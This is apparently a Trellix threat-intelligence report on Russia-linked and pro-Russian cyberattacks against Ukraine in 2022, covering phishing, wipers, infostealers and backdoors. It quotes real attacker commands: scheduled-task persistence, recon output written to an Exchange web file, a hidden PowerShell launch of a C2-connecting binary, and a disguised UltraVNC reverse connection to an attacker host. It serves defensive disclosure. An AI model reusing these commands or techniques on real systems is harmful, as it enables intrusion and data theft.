# Growling Bears Make Thunderous Noise
By Trellix Â· June 6, 2022
Per public attribution, Russian cybercriminal groups have always been active. Their tactics, techniques, and procedures (TTPs) have not significantly evolved over time, although some changes have been observed. Lately, the threat landscape has changed, as multiple domains have partially merged. This trend was already on-going, but the increased digital activity further accelerated and exposed said trend. This paper will cover the cybercriminal evolutions over time, the impact of a (cyber)war, observed activity, and finally a call to action.
## Cybercriminal evolutions over time
The changes over time can be split into multiple evolutions, where each evolution is based on the one prior. This section provides insight into these evolutions, in chronological order. As these events unfolded organically, it is important to note that there is no exact date when one transformed into another. The goal here is to provide a further understanding of the historic events which occurred prior to the latest, and still ongoing, transformation.
Whenever there is money to be made, there are people willing to risk it all. Some arenât shy to break the law to gather a fortune, although each criminal individualâs actions differ, the result is the same. The digital world is certainly no exception, where one can argue that the anonymous nature of online interactions might be an accelerant. Most offenders generally operate based on opportunity. A server which hasnât been patched for years makes for an easy target, especially with publicly available tooling to exploit the discovered vulnerabilities.
## Organized cybercrime
The next step, as is also seen in traditional crime, is for individuals to organize themselves. The more generalist nature of the original cybercriminals required defenders to uphold a certain level of security. The bundling of forces allows individuals to branch out into a specific area of expertise. As such, the previously set security standards become insufficient, thus requiring blue teams to raise the bar. With the additional knowledge, groups can exploit vulnerabilities based on incomplete write-ups or partial proof-of-concepts. Their targets are still opportunity based, allowing the actors to target a wider variety of potential victims. The path of the least resistance is generally the most profitable here.
## Nation state campaigns
Nation state campaigns are often set up with a different goal than (organized) cybercrime. Usually, such actors conduct online espionage, potentially along with in-person espionage. These groups are commonly characterized by their advanced methods, their persistent nature, and the threat they pose, commonly summarized as an Advanced Persistent Threat, abbreviated as APT. Their goal is to complete the set objective(s), without solely relying on opportunity.
Naturally, misconfigured machines and publicly available exploits provide ample opportunities to these groups, as can be seen with the ProxyLogon and ProxyShell vulnerabilities and their aftermath. These groups are, in contrast to most (organized) cybercrime, able to find their own way into a given target. The more advanced nation states are capable of finding vulnerabilities and creating their own exploits for them, ahead of the general public. This makes such an attack difficult to defend against, and the relentless nature of these groups drags the battle between the attacking and defending groups on, until the victim is either compromised, or no longer of strategic value for the attacker.
Additionally, nation state backed groups do not always opt to profit directly from their activity. Taking systems hostage with ransomware, or simply wiping them using a wiper, imposes a cost on victims as they need to restore their systems, deal with downtime, and ensure the integrity of the (seemingly) unaffected systems.
## Merging domains
Long has there been speculation with regards to nation state involvement in (organized) cybercrime. This is difficult to prove in general, and even with some proof, skeptics continue to poke holes in the attribution. The leak of the Conti chats, more on which below, has provided solid evidence of the groupâs ties with the Russian government. The amount of proof for such a claim is the first of its kind and allows analysts to view the exact conversations between actors. The criminals benefit by getting âimmunityâ of sorts, whereas the nation state benefits from the covered operation under the flag of the actor. Especially in the case when collaborating with a ransomware gang, such as Conti, the encrypted systems provide little information about the intrusion and activities on the system. This further masks the actions that were performed on the system.
Since many Ukraine government sites were taken offline by suspected Russian actors in January 2022, Trellix Threat Labs has seen many parties involved, from civilian groups, such as the different âanonymousâ movements, to semi-government sponsored groups like the âUkrainian Cyber Armyâ, to nation-state groups that disrupt communication and infrastructure. Each of them is leveraging open-source adversary tools in their attacks, which makes it difficult to attribute the attacks to one or more specific groups. In the image below, the distinct groups, and the most prevalent observed attack methods, Trellix Threat Labs has observed over time are given. They categorized into âAN_â groups, the anonymous movement like groups; âPro_â groups, which are conducting attacks showing their allegiance towards one of the countries involved in the conflict; and âAPT_â groups, nation-state-sponsored groups.
![Overview of groups involved in the conflict.](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-1.jpg) Figure 1. Overview of groups involved in the conflict.
As one can imagine, tracking activities on the social media platforms many of these groups are using can be challenging. From the information posted, one must consider: is it reliable, is it misinformation, is it propaganda, are images or data manipulated or backdoored?
With these attacks happening, the barriers which are traditionally seen between the different actors are blurring. As barriers become distorted, filling out a diamond model of intrusion on the different actors involved gets more complicated because of the similar tools and techniques and targets.
![Fading barriers](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-2.jpg) Figure 2. Fading barriers
As illustrated earlier on, the Conti ransomware groupâs stance with regards to the Russian invasion in Ukraine cost them, as their data was leaked, providing researchers not only with the aforementioned chat leaks, but also a copy of the ransomwareâs source code. A pro-Ukrainian group, dubbed NB65, then took this source code and modified it, after which they started to attack targets in Russia. Due to the policeâs protection, the actorâs own region is often left unaffected, a small price to pay to ensure little to no police involvement, making this move rather unheard of. Below is a screenshot of the NB65âs ransomware note.
![Ransom note](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-3.jpg) Figure 3. Ransom note
Cybercriminal groups could have been used to gain access credentials from potential targets. We have seen from the leaked Conti chats that the group was in contact with government officials that asked for âinformationâ on compromised networks. Why spend resources gaining credentials when it is possible to ask cybercrime groups for access credentials then offer âprotectionâ? Once long-term access has been established, intelligence can be exfiltrated and during a conflict, disruptive actions can be executed, as can be read about in the next section.
## The impact of (cyber)war
With the ever-increasing intertwining of our digital and physical lives, the impact of a (digital) war is increasing day by day. Thereâs been a lot of speculation about a âfull blown cyberwarâ prior to the Russian invasion. Something can be said in favor of these arguments, but when missiles explode in your vicinity, computers arenât that interesting anymore. Once the most direct danger has passed, however, the digital domain is vital to securely and timely communicate with one another. It is also a safe way to perform reconnaissance, in contrast to sending a squad to scout a hostile area.
To support our customers and the people of Ukraine, Trellix Threat Labs coordinated with multiple government institutions to provide them with the necessary telemetry insights, intelligence briefings and analysis of the malware tools used by Russian actors. A large portion of Trellix’s efforts were performed in discretion as protection of our customers is our highest priority.
## Observed activity
Just as physical warfare uses a multitude of military tactics and equipment, Trellix Threat Labs has observed similar activity on the cyberfront, including but not limited to wipers, spear-phishing, back-doors, vulnerabilities, and many other techniques. In the following sections, several of these activities will be highlighted, along with the attributed actors.
Initially, we observed different groups using several tactics to gain access, gather information and credentials, and establish and maintain access to the victimâs networks. The visualization below showcases which groups were observed, along with their initial attack modus operandi, after which they determined their next steps.
![Initial attack techniques used by observed groups](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-4.jpg) Figure 4. Initial attack techniques used by observed groups
Over the years, the pro-Russian Gamaredon group has been digitally operating in Ukraine. Their targets are mostly national institutes and government entities, based on Trellix Labsâ observations.
From February to March 2022, we observed a Word document attached to a spear-phishing e-mail which was created to appear as a legitimate Ministry of Foreign Affairs document, while it was backdoored with a VBS script to download and install a persistent file on the victimâs machine.
![Attack overview Gamaredon using backdoored Office documents](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-5.jpg) Figure 5. Attack overview Gamaredon using backdoored Office documents
![Example of the document](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-6.jpg) Figure 6. Example of the document
After opening this document, the script in the macro code was executed:
![Macro code example](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-7.jpg) Figure 7. Macro code example
Cleaning up the code, we observe the creation of a scheduled task. The taskâs schedule frequency is set to minutes, where the modifier is set to 12.
_Wscript.exe launching “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr_
The scheduled task downloads the payload from this website:
After the download, the rar file is renamed to a .exe file and is saved as a vbs file:
Unfortunately, the final payload was not available for analysis, but the pattern of intrusion and macro code were similar observed by others investigating this same actor.
During that same timeframe, we observed a similar document used to target victims. Although both documents are dated (based on metadata, but we realize these can be manipulated), it could either be a case of simulating an attack or re-using the same modus operandi with adjusted payloads.
When the macro is executed in the second document, it follows the below steps:
* Winword.exe creating the file
* Wscript.exe launching the process schtasks.exe with command line
“C:WindowsSystem32schtasks.exe” /Create /SC MINUTE /MO 12 /F /tn
Word.Downdloads /tr C:Users
* Wscript.exe launching the process schtasks.exe with command line
“C:WindowsSystem32schtasks.exe” /Create /SC MINUTE /MO 15 /F /tn
* Downloads payload from hxxp://cornelius.website/WindowsNewsense.php
* Appends and creates the file âIndexOffice.vbs)
## Phishing the Ukrainian Ministry of Defense
In March, we observed several phishing attempts trying to impersonate the Ministry of Defense of Ukraine. One email, sent on March 23rd, had the subject âÐÐ¾ÑÑÑÐ¿Ð½Ð¸Ð¹ Ð½Ð¾Ð²Ð¸Ð¹ ÑÐµÑÑÑÑâ (âA new resource is availableâ in English), and was sent to at least 42 recipients. The URL in the message pointed to hxxp://file-milgov[.]systems/ and the domain resolved to the following IP 93.95.227[.]226, which belongs to a hosting provider in Iceland. We were not able to identify who might have setup these campaigns. In the bigger picture of observing several tactics and techniques being used, this is another example of adversaries can attempt to gain credentials from victim networks.
Upon closer inspection of the webpage, it asks for a username and password and identifies itself as the âÐÑÐ½ÑÑÑÐµÑÑÑÐ²Ð¾ ÐÐ±Ð¾ÑÐ¾Ð½Ð¸ Ð£ÐºÑÐ°ÑÐ½Ð¸ Ð¤Ð°Ð¹Ð»Ð¾Ð²Ðµ ÑÑ Ð¾Ð²Ð¸ÑÐµâ, which translates to âMinistry of Defense of Ukraine File Storageâ in English.
![Fake login page](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-8.jpg) Figure 8. Fake login page
When a user fills in credentials, the webpage responds with a small error message at the bottom of the page: âÐÐµÐ²Ð´Ð°Ð»Ð° ÑÐ¿ÑÐ¾Ð±Ð° Ð²Ñ Ð¾Ð´Ñâ translates to âUnsuccessful login attemptâ.
![The error message](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-9.jpg) Figure 9. The error message
The specific server had other error pages which mimicked another internal error: âÐÐ¸Ð±Ð°ÑÑÐµ, Ð½Ð° ÑÐµÑÐ²ÐµÑÑ ÑÐµ Ð²ÐµÐ´ÑÑÑÑÑ ÑÐµÑ Ð½ÑÑÐ½Ñ ÑÐ¾Ð±Ð¾ÑÐ¸â, which translates to âSorry, the server is still undergoing technical workâ in English.
![Different Error message found on the server ](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-10.jpg) Figure 10. Different Error message found on the server
![Another suspected Phishing page.](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-11.jpg) Figure 11. Another suspected Phishing page.
The IP address 82.221.139[.]137 was observed in other spear phishing campaigns impersonating the cybersecurity center and CSOC in Ukraine.
Communication is vital to survive during wartime, and the adversarial use of malware attacks to âwipeâ communication systems has been widespread in the region. A wiperâs sole purpose is to wipe the device it is executed on, and potentially other connected devices. If the execution is successful, the device is rendered useless, and whether back-ups are available or not, the machine does not function at all. The recovery of a single machine might not take long, but the restoration of a company or government-wide attack may take months and cause disruption when communication, access to data, and coordination are critical.
When actors choose to use a wiper, they know that the weapon may be used against them. Aside from the damage, it is often used as propaganda to demonstrate how âweakâ the enemyâs defenses are. In the diagram below, the different wiper families that have been observed since the start of the conflict, including attribution, are visualized. [Ember Bear]() and [APT28]() are Russian nation state actor groups, where the other groups are likely to be pro-Russian or pro-Ukrainian, however not enough evidence is available to make those claims solid.
![Wiper families and their attribution](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-12.jpg) Figure 12. Wiper families and their attribution
Itâs important to understand that to deploy a wiper, the actor needs access to the physical disk, which requires administrator or system privileges. We have observed actors using trusted tools and stolen certificates, mimicking ransomware, and employing several tactics to hide these attack-tools from being detected and ensure that access to the network remains available to the actor.
In one example, Trellix Threat Labs observed an actor access a victimâs network with the intent to wipe their systems. When the first wiper (dubbed WhisperGate) failed to execute, it took the actors only two and a half hours to deploy another wiper (HermeticWiper) instead.
## Targeted exchange servers
One of our Ukrainian clients also detected activities in March 2022, using vulnerabilities to attack the internal network and store the output in a file accessible from the Internet. In the command-lines below, we observe that the actor is gaining information from the system and writing the output of the command towards the file âowafont_ua.cssâ hosted on the OWA Exchange webserver.
Checking for the content of the âusosharedâ folder that is part of the Windows Update mechanism, we found the folder mostly contains etl files, files that contain system log events from the Windows System Kernel:
c:windowssystem32cmd.exe /c dir c:programdatausoshared > “C:Program FilesMicrosoftExchange
Here the attacker is launching the command to discover if any scheduled tasks with details are present on the system:
c:windowssystem32cmd.exe /c schtasks /query /v > “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthcurrentthemesresourcesowafont_ua.css”
c:windowssystem32cmd.exe /c systeminfo > “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthcurrentthemesresourcesowafont_ua.css”
Querying for task lists:
c:windowssystem32cmd.exe /c tasklist >> “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthcurrentthemesresourcesowafont_ua.css”
Querying for active TCP network connections on the victimâs system:
c:windowssystem32cmd.exe /c netstat -anbp tcp >> “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthcurrentthemesresourcesowafont_ua.css”
Showing the ARP table/cache on the host to discover more hosts on a network:
c:windowssystem32cmd.exe /c arp -a >> “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthcurrentthemesresourcesowafont_ua.css”
These commands were executed in such a rapid manner that these were executed using a webshell, stored on that same Exchange server.
In April 2022, Trellix Labs observed indicators which the Ukrainian CERT has [attributed]() to Russian threat group UAC-0056. The attack primarily targets the Ukrainian government and energy sector.
Malicious Excel documents were sent as attachments from a compromised email account. Once the document was opened, either embedded code would be constructed and executed, or it would download the next stage from the Internet. The next stage ranges from implants to Cobalt Strike beacons. Compromised sites, Discord servers, and pre-staged domains have been observed to store these implants. The implants go by the name Graphsteel and Grimplant and were implemented to steal user credentials, network information, and then exfiltrate said information in encrypted form to the C2 using a Googleâs high performance Remote Procedure Call framework called gRPC.
![Attack overview GraphSteel and Grimplant](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-13.jpg) Figure 13. Attack overview GraphSteel and Grimplant
On April 18, 2022, a malicious email, presumably from a compromised ukr[.]net account, with subject âua_reportâ, was observed on one of our email gateways. This email attempted to lure the victim to open the attached compressed file with the following line âOperation âThe Eye of Sauronâ resultsâ followed by the password needed to open the attachment.
![Attack flow overview APT28 attack](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-14.jpg) Figure 14. Attack flow overview APT28 attack
Once executed, the password protected self-extracting RAR will drop on the system an executable called âDoc_Viewer.exeâ or âDocumentSaver.exeâ, and a DLL called âSQLite.Interop.dllâ. The executable is a .NET infostealer which uses the bundled DLL to interact with various browserâs SQLite databases and extract the stored credentials and cookies. This activity was [reported]() by Googleâs TAG and attributed to the infamous APT28 aka Fancy Bear threat actor, known for its ties with the Russian GRU.
On execution the infostealer will remove its traces, for stealthy purposes, by deleting the SQLite DLL and the malicious executable, as can be seen in the code below.
cmd.exe /C Del SQLite.Interop.dll
cmd.exe /C Del C:Users\AppDataLocalTempRarSFX0Doc_Viewer.exe
This is an example of the .NET malware stealing credentials, more specifically trying to obtain the stored cookies in the Firefox database. Cookies can contain values that can be abused to hijack the session from the user and impersonate as that user.
![Code example of grabbing cookie values](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-15.jpg) Figure 15. Code example of grabbing cookie values
After it is finished gathering stolen credentials, the .NET sample will leverage compromised IMAP credentials embedded on the sample to exfiltrate the stolen information. We have observed the following compromised accounts used to connect to the indicated IMAP servers
On May 9, 2022, a government client in Ukraine received a spear phishing email to one of their general email addresses. The email contained a message pointing to a catalog included in a zip archive, which could be found at the given Google Drive URL: drive.google.]com/file/d/1JBYjdNp5NnvJyYtR5azWBuRZZIjhto9z. To open the archive, the recipient needs a password (â ifYQFlâ without quotes), which is enclosed within the e-mail’s body, as can be seen below.
_ÐÐ¾Ð±ÑÐ¸Ð¹ Ð´ÐµÐ½Ñ, Ð¼ÐµÐ½Ðµ Ð·Ð²Ð°ÑÐ¸ ÐÐ½Ð´ÑÑÐ¹, Ð¯ Ñ ÑÐ¿ÑÐ²ÑÐ¾Ð±ÑÑÐ½Ð¸ÐºÐ¾Ð¼ ÐÐ âÐ£ÐºÑÐ¾Ð±Ð¾ÑÐ¾Ð½Ð¿ÑÐ¾Ð¼â. ÐÐ°
ÑÑÐ¾Ð³Ð¾Ð´Ð½ÑÑÐ½ÑÐ¹ Ð´ÐµÐ½Ñ Ñ Ð½Ð°Ñ Ð²Ð¸Ð½Ð¸ÐºÐ»Ð¸ Ð¿Ð¾ÑÑÐµÐ±Ð¸ Ð² Ð´Ð¾ÑÐºÐ¾Ð¼Ð¿Ð»ÐµÐºÑÑÐ²Ð°Ð½Ð½Ñ, Ð·Ð¾ÐºÑÐµÐ¼Ð° Ð²
Ð´Ð°Ð½Ð¸Ð¹ Ð¼Ð¾Ð¼ÐµÐ½Ñ Ð°ÐºÑÑÐ°Ð»ÑÐ½Ñ Ð´ÐµÑÐ°Ð»Ñ Ð´Ð¾ ÐÐÐ Ñ Ð¿Ð°ÑÑÐ¾Ð½Ð¸ Ð´Ð¾ ÑÑÑÑÐ»ÐµÑÑÐºÐ¾Ñ Ð·Ð±ÑÐ¾Ñ, Ð¼ÐµÐ½Ñ
Ð´Ð°Ð»Ð¸ Ð²Ð°Ñ ÐºÐ¾Ð½ÑÐ°ÐºÑ Ñ ÑÐºÐ°Ð·Ð°Ð»Ð¸ ÑÐ¾ Ð²Ð¸ Ð¼Ð¾Ð¶ÐµÑÐµ Ð¿Ð¾ÑÐ¿ÑÐ¸ÑÑÐ¸ Ð² ÑÑÐ¾Ð¼Ñ Ð½Ð°Ð¿ÑÑÐ¼ÐºÑ. Ð©Ð¾
ÑÑÐ¾ÑÑÑÑÑÑÑ ÑÑÐ¸Ð´Ð¸ÑÐ½Ð¾Ñ ÑÐ°ÑÑÐ¸Ð½Ð¸ Ð¼Ð¸ Ð½Ð°Ð¿ÑÐ°Ð²Ð¸Ð¼Ð¾ ÐÐ°Ð¼ Ð¾ÑÑÑÑÐ¹Ð½Ñ Ð»Ð¸ÑÑÐ¸. ÐÑÐ´Ñ Ð»Ð°ÑÐºÐ°
Ð¿Ð¾Ð´Ð¸Ð²ÑÑÑÑÑ Ð² Ð°ÑÑ ÑÐ²Ñ ÑÐ¸ Ñ Ñ Ð²Ð°Ñ ÐºÐ¾Ð¼Ð¿Ð»ÐµÐºÑÑÑÑÑ, ÑÐºÑ Ð²Ð¸ Ð¼Ð¾Ð¶ÐµÑÐµ Ð½Ð°Ð´Ð°ÑÐ¸ Ð½Ð°Ð¼._
_ÐÐ°ÑÐ¾Ð»Ñ Ð´Ð¾ Ð°ÑÑ ÑÐ²Ñ: ifYQFl_
_ÐÐµÐ¾Ð±Ñ ÑÐ´Ð½Ñ ÑÐ°ÑÑÐ¸Ð½Ð¸.zip_
![Attack Flow Overview DoubleDrop](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-16.jpg) Figure 16. Attack Flow Overview DoubleDrop
The LNK file contains a PowerShell reference command to be executed, which executes a base64 encoded command in a hidden window. The decoded command is given below.
Start-Process -FilePath â$env:temphelper.exeâ -ArgumentList ââhost 188.8.131.52 âport 4433â -WindowStyle Hidden;
The newly created web client is used to download the âhelper.exeâ file in the temporary fileâs directory, from the given URL. Note that the added bracket is not present in the original script but is used to defang the URL in this article. The newly downloaded executable is then executed as a new process with a hidden window, together with four arguments which specify the host and port to be used. At last, the LNK file, which originally started this execution chain, is deleted.
Investigating one of the endpoints, we observe the following path:
_C:Users\*********AppDataLocalTemphelper.exeâ âhost 184.108.40.206 âport 4433_
The âhelper.exeâ binary is written in the GO language. Several anti-analysis tricks, such as obfuscating strings and garbage code, have been applied to make the analysis of this binary more challenging.
From the log files we observed that the âhelper.exeâ is querying the system information from the registry and sends that onwards to the C2 server. Also, information from the Internet Browser like cookies, form history, passwords and more are gathered and forwarded. From the traffic analysis we can observe that the C2 server was hosting a special âdataâ folder for it:
_Post âhttps://46.229.215.]108:4433/dataâ: write tcp X.X.X.X:49202->220.127.116.11:4433: wsasend_
At the same time a batch script is installed and after initial information is gathered, it will delete the helper.exe and the batch script:
chcp 65001~~TaskKill /F /IM 3796~~Timeout /T 2 /Nobreak~~Del /a
cmd.exe â/C C:Users\***AppDataLocalTemp/1.bat & Del 1.bat
Overall, we observed a well setup operation, many parts attempting as much as possible to circumvent detection to gather information that can be used to compromise the victim and get further access to the network.
## Gamaredon activity
Trellix Threat Labs detected the presence of an UltraVNC Remote Admin tool on one of our Ukrainian customers. Remote admin tools are often used to bypass security controls. The executable was discovered in the following path:
Pivoting from our initial data, we discovered, we found the parent SFX archive file.
![Attack Flow Overview](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-17.jpg) Figure 17. Attack Flow Overview
The self-extracting archive has the following commands:
![SFX Config Options](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-18.jpg) Figure 18. SFX Config Options
This will essentially extract the files in the archive to %APPDATA% folder and then execute the 14991.cmd batch file.
The contents of the 14991.cmd batch file is as follows:
![Contents of the 14991.cmd file](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-19.jpg) Figure 19. Contents of the 14991.cmd file
This will essentially copy 31850.ini to wuauclt.exe and start wuauctl.exe with the following command line:
“%CD%wuauclt.exe” -autoreconnect -id:%RANDOM% -connect torrent-vnc.ddns[.]net:5612
The advantage of each of these command line options is as follows:
* wuauclt.exe â UltraVNC server disguised as windows update auto update client of Microsoft
* autoreconnect – Attempt to reconnect to the listening viewer if the connection drops
* connect â Reverse-connect to the repeater host on specific host and port, this is used to bypass any firewall restrictions since the connection is initiated by the victim
* id â serves as a unique UltraVNC server identifier to the repeater, the advantage of this repeater setup is primarily two-fold:
* It allows for connections to multiple servers; this gives attacker the ability to use the same payload for all victims and attacker can also simply change this repeater C2 host if they want to reuse payload in a future campaign
* The Repeater host acts as a proxy for the server and the viewer; this gives attacker the ability to mask the real host on which he is running the UltraVNC viewer
UltraVNC.ini is the UltraVNC configuration file that will be consumed by UltraVNC server. The files rc4.key, MSRC4Plugin_for_sc.dsm are also consumed by the UltraVNC server program to encrypt the UltraVNC network traffic.
## A call to action
Trellix has historically had a significant customer base in Ukraine and when the cyberattacks targeting the country intensified, we coordinated closely with government and industry partners to provide greater visibility into the evolving threat landscape. We have been eager to support the region against malicious cyber activity and have been able to go beyond sharing knowledge to also provide a wide range of security appliances at no cost in the affected region (our special thanks go out to our partners at Mandiant in getting some of the appliances deployed at those organizations who needed protection the most).Read More
Back to Main